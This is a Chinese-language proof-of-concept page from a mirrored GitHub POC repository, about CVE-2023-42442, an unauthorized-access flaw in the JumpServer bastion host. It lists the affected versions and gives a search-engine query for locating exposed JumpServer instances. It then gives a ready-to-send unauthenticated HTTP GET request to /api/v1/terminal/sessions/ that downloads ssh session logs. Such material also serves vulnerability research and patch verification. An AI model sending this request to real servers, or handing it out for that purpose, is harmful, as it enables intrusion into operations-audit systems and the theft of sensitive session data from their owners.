admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 22:14:15 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/JumpServer/JumpServer存在未授权访问漏洞(CVE-2023-42442).md

30 lines
1.5 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# JumpServer存在未授权访问漏洞CVE-2023-42442
# 一、漏洞简介
JumpServer开源堡垒机是一款运维安全审计系统产品提供身份验证、授权控制、账号管理、安全审计等功能支持帮助企业快速构建运维安全审计能力。JumpServer开源堡垒机通过企业版或者软硬件一体机的方式向企业级用户交付开源增值的运维安全审计解决方案。api/api/v1/terminal/sessions/权限控制存在逻辑错误可以被攻击者匿名访问。未经身份验证的远程攻击者可利用该漏洞下载ssh日志并可借此远程窃取敏感信息。存储在 S3、OSS 或其他云存储中的ssh会话不受影响。
# 二、影响版本
+ <font style="color:black;">3.0.0 <= JumpServer <= 3.5.4</font>
+ <font style="color:black;">3.6.0 <= JumpServer <= 3.6.3</font>
# <font style="color:black;">三、资产测绘</font>
+ hunter`app.name="JumpServer"`
+ 特征:
![1696131346283-6a696011-dc5b-4c76-84a3-1f81b9ffb50b.png](./img/fuItFEC7-w-QTsDh/1696131346283-6a696011-dc5b-4c76-84a3-1f81b9ffb50b-786611.png)
# 四、漏洞复现
```plain
GET /api/v1/terminal/sessions/ HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```
![1696131423235-b969b6ea-4f13-4974-8e56-53063704b1ac.png](./img/fuItFEC7-w-QTsDh/1696131423235-b969b6ea-4f13-4974-8e56-53063704b1ac-468514.png)
> 更新: 2024-02-29 23:57:14
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pgq8hot5pwuqi3oo>
Reference in New Issue Copy Permalink